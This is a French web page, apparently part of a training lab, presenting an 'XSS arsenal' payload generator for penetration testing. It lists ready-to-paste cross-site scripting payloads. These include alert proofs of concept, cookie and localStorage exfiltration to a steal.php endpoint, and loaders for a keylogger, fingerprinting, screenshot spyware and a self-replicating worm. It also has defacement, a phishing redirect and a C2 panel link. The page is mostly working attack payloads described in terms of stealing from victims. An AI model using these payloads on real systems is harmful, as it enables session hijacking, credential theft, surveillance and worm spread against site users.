← Retour au Lab

RED_TEAM / XSS_ARSENAL

PAYLOAD GENERATOR

Arsenal d'exploitation XSS pour tests de pénétration

01 // PROOF OF CONCEPT

Le test standard. Sert à confirmer la vulnérabilité.

<script>alert('XSS_SUCCESS')</script>

<img src=x onerror=alert(1)>

02 // COOKIE & DATA EXFILTRATION

Voler la session, l'URL courante ou le LocalStorage.

<img src=x onerror="this.src='/lab/xss/evil/steal.php?cookie='+document.cookie">

<script>fetch('/lab/xss/evil/steal.php?storage='+encodeURIComponent(JSON.stringify(localStorage)))</script>

05 // KEYLOGGER

Enregistre toutes les frappes clavier de la victime.

<script src="/lab/xss/evil/keylogger.js"></script>

06 // FINGERPRINTING

Récupère la config: OS, IP, Plugins, Résolution, Hardware.

<script src="/lab/xss/evil/fingerprint.js"></script>

03 // DEFACEMENT

Modifier l'apparence du site pour les autres utilisateurs.

<style>body{background:red !important;}</style>

<script src="/lab/xss/evil/exploit_payload.js"></script>

// EVIL_SERVER (C2)

Accéder au serveur d'exfiltration.

🍪 COOKIES CREDS SCREENS KEYS TARGETS

04 // SPYWARE (HTML2CANVAS)

Prend des screenshots de la victime (Chargement + Changement d'onglet).

<script src="/lab/xss/evil/spyware.js"></script>

07 // PHISHING REDIRECT

Redirige la victime vers une fausse page de login.

<script>window.location='/lab/xss/evil/phishing.php'</script>

08 // SELF-REPLICATING WORM

Virus auto-répliquant qui infecte le feed public.

<script src="/lab/xss/evil/worm.js"></script>